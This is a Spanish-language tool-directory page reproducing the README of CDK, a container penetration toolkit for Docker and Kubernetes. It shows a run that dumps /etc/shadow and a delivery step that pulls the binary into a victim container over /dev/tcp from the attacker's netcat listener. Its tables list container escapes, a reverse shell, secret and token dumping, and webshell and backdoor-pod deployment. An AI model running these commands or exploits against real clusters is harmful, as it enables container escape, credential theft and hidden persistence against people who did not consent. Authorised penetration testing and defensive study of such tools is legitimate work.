Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CDK — 📦 Facilita las pruebas de seguridad de K8s, Docker y Containerd. | Kitploit
Herramientas/GitHubGitHub/cdk-team/cdk
Escalada de PrivilegiosReconocimientoSeguridad de ContenedoresMecanismos de PersistenciaExplotaciónMovimiento LateralPost-ExplotaciónPruebas de PenetraciónSeguridad en la NubeEscape de ContenedoresTop en Escape de Contenedores #2
4.7k60611hace 4 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubcdk-team/cdk

CDK

📦 Facilita las pruebas de seguridad de K8s, Docker y Containerd.

Ver RepositorioSitio web

CDK - Kit de Penetración de Contenedores Sin Dependencias

Inglés | 简体中文

png

Aviso Legal

El uso de CDK para atacar objetivos sin consentimiento mutuo previo es ilegal. CDK es solo para fines de pruebas de seguridad.

Resumen

CDK es un kit de penetración de contenedores de código abierto, diseñado para ofrecer una explotación estable en diferentes contenedores reducidos sin ninguna dependencia del sistema operativo. Viene con útiles herramientas de red y muchos PoCs/EXPs potentes y te ayuda a escapar del contenedor y tomar el control del clúster K8s fácilmente.

Inicio Rápido

Ejecuta cdk eva para obtener información de evaluación y un exploit recomendado, luego ejecuta cdk run para iniciar el ataque.

root@kitploit:~
> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

Instalación/Entrega

Descarga la última versión en https://github.com/cdk-team/CDK/releases/

Coloca los archivos ejecutables en el contenedor objetivo y comienza las pruebas.

CONSEJOS: Entregar CDK en el contenedor objetivo en pruebas de penetración reales

Si tienes un exploit que puede subir un archivo, entonces puedes subir el binario de CDK directamente.

Si tienes un exploit RCE, pero el contenedor objetivo no tiene curl ni wget, puedes usar el siguiente método para entregar CDK:

  1. Primero, aloja el binario de CDK en tu máquina con IP pública.
root@kitploit:~
(en tu máquina)
nc -lvp 999 < cdk
  1. Dentro del contenedor víctima ejecuta
root@kitploit:~
cat < /dev/tcp/(tu_ip_pública)/(puerto) > cdk
chmod a+x cdk

Uso

root@kitploit:~
Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of ectd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.
  --profile=<name> Select evaluation profile.

Características

CDK tiene tres módulos:

  1. Evaluate: recopila información dentro del contenedor para encontrar posibles debilidades.
  2. Exploit: para escape de contenedores, persistencia y movimiento lateral.
  3. Tool: herramientas de red y APIs para solicitudes TCP/HTTP, túneles y gestión de clústeres K8s.

Módulo Evaluate

Uso

root@kitploit:~
cdk evaluate [--full]

Módulo Exploit

Lista todos los exploits disponibles:

root@kitploit:~
cdk run --list

Ejecuta exploit dirigido:

root@kitploit:~
cdk run <script-name> [options]

Nota sobre Thin: La versión thin está preparada para shells de contenedores de corta duración como funciones serverless. Agregamos etiquetas de compilación en el código fuente y eliminamos algunos exploits para que el binario sea más ligero. El archivo de 2MB contiene el 90% de las funciones de CDK, también puedes seleccionar exploits útiles del código fuente de CDK para construir tu propio binario ligero.

Módulo Tool

Ejecuta comandos como en Linux, ligeramente diferente en los argumentos de entrada, consulta el enlace de uso.

root@kitploit:~
cdk nc [options]
cdk ps

Documento de Versión

Si quieres saber cómo lanzamos una nueva versión, cómo se produce thin, por qué proporcionamos versiones upx, cuáles son las diferencias entre las diferentes versiones (all, normal, thin, upx) y cómo elegir exploits y herramientas específicas de CDK para compilar tu propio lanzamiento, consulta el Documento de Versión.

Documentación para Desarrolladores

  • ejecutar prueba en contenedor.

Contribuir a CDK

En primer lugar, ¡gracias por tomarte el tiempo para contribuir!

Gracias a los siguientes colaboradores:

Más colaboradores:Lista de Colaboradores

Reporte de Errores

Los errores se rastrean como GitHub Issues. Crea un issue con la versión actual de CDK, el mensaje de error y el entorno. Describe los pasos exactos que reproducen el problema.

Sugerir Mejoras

Las sugerencias de mejora se rastrean como GitHub Discussions. Puedes publicar cualquier pensamiento aquí para discutir directamente con los desarrolladores.

Pull Requests

Corregir problemas o mantener la calidad de CDK:

  • Describe la versión actual de CDK, el entorno, el problema y los pasos exactos que reproducen el problema.
  • Capturas de pantalla o registros en ejecución antes y después de corregir el problema.

Nueva característica o exploits:

  • Explica por qué esta mejora sería útil para otros usuarios.
  • Por favor, permite un entorno sostenible para que revisemos las contribuciones.
  • Capturas de pantalla sobre cómo funciona esta nueva característica.
  • Si estás enviando nuevos scripts de evaluate/exploit, agrega una documentación simple a tu mensaje de PR, aquí hay un ejemplo.

Eventos

404StarLink 2.0 - Galaxy

png

El proyecto CDK ahora está incluido en 404Team Proyecto Starlink 2.0. Únete a la comunidad StarLink para ponerte en contacto con el equipo de desarrollo de CDK.

  • https://github.com/knownsec/404StarLink2.0-Galaxy#community

BlackHat Asia 2021 Arsenal

  • https://www.blackhat.com/asia-21/arsenal/schedule/index.html#cdk-zero-dependency-container-penetration-toolkit-22422

HITB SecConf 2021 Amsterdam

  • Briefing: "Attack Cloud Native Kubernetes"

WHC 2021 (补天白帽大会)

  • CDK: Also a Awesome BugBounty Tool for Cloud Platform

KCON 2021 Arsenal

  • http://kcon.knownsec.com/2021/#/arsenal

Kubernetes community Days 2021

  • https://community.cncf.io/events/details/cncf-kcd-china-presents-kubernetes-community-days-china/
Descargar herramienta
TácticasScriptSoportadoUso/Ejemplo
Recopilación de InformaciónOS Basic Info✔link
Recopilación de InformaciónAvailable Capabilities✔link
Recopilación de InformaciónAvailable Linux Commands✔link
Recopilación de InformaciónMounts✔link
Recopilación de InformaciónNet Namespace✔link
Recopilación de InformaciónSensitive ENV✔link
Recopilación de InformaciónSensitive Process✔link
Recopilación de InformaciónSensitive Local Files✔link
Recopilación de InformaciónKube-proxy Route Localnet(CVE-2020-8558)✔link
Recopilación de InformaciónDNS-Based Service Discovery✔link
DescubrimientoK8s Api-server Info✔link
DescubrimientoK8s Service-account Info✔link
DescubrimientoCloud Provider Metadata API✔link
TácticaTécnicaNombre del Exploit CDKSoportadoEn ThinDoc
Escapedocker-runc CVE-2019-5736runc-pwn✔✔
Escapecontainerd-shim CVE-2020-15257shim-pwn✔link
Escapedocker.sock PoC (DIND attack)docker-sock-check✔✔link
Escapedocker.sock RCEdocker-sock-pwn✔✔link
EscapeDocker API(2375) RCEdocker-api-pwn✔✔link
EscapeDevice Mount Escapingmount-disk✔✔link
EscapeLXCFS Escapinglxcfs-rw✔✔link
EscapeCgroups Escapingmount-cgroup✔✔link
EscapeAbuse Unprivileged User Namespace Escaping CVE-2022-0492abuse-unpriv-userns✔✔link
EscapeProcfs Escapingmount-procfs✔✔link
EscapePtrace Escaping PoCcheck-ptrace✔✔link
EscapeRewrite Cgroup(devices.allow)rewrite-cgroup-devices✔✔link
EscapeRead arbitrary file from host system (CAP_DAC_READ_SEARCH)cap-dac-read-search✔✔link
DescubrimientoK8s Component Probeservice-probe✔✔link
DescubrimientoDump Istio Sidecar Metaistio-check✔✔link
DescubrimientoDump K8s Pod Security Policiesk8s-psp-dump✔link
Control RemotoReverse Shellreverse-shell✔✔link
Control RemotoKubelet Execkubelet-exec✔✔
Acceso a CredencialesRegistry BruteForceregistry-brute✔✔link
Acceso a CredencialesAccess Key Scanningak-leakage✔✔link
Acceso a CredencialesEtcd Get K8s Tokenetcd-get-k8s-token✔✔
Acceso a CredencialesDump K8s Secretsk8s-secret-dump✔✔link
Acceso a CredencialesDump K8s Configk8s-configmap-dump✔✔link
Escalada de PrivilegiosK8s RBAC Bypassk8s-get-sa-token✔✔link
Escalada de PrivilegiosCVE-2026-31431 copy-fail (non-root→root & x86_64 only)copy-fail-cve-2026-31431✔link
PersistenciaDeploy WebShellwebshell-deploy✔✔link
PersistenciaDeploy Backdoor Podk8s-backdoor-daemonset✔✔link
PersistenciaDeploy Shadow K8s api-serverk8s-shadow-apiserver✔link
PersistenciaK8s MITM Attack (CVE-2020-8554)k8s-mitm-clusterip✔✔link
PersistenciaDeploy K8s CronJobk8s-cronjob✔✔link
ComandoDescripciónSoportadoUso/Ejemplo
ncTúnel TCP✔link
psInformación de Procesos✔link
netstatLike "netstat -antup" command✔
ifconfigInformación de Red✔link
viEditar Archivos✔link
ectlEnumeración no autorizada de claves ectd✔
kcurlSolicitud al servidor de API de K8s✔link
dcurlSolicitud a la API HTTP de Docker✔link
ucurlSolicitud al socket Unix de Docker✔link
rcurlSolicitud a la API de Docker Registry
probeEscaneo de IP/Puertos✔link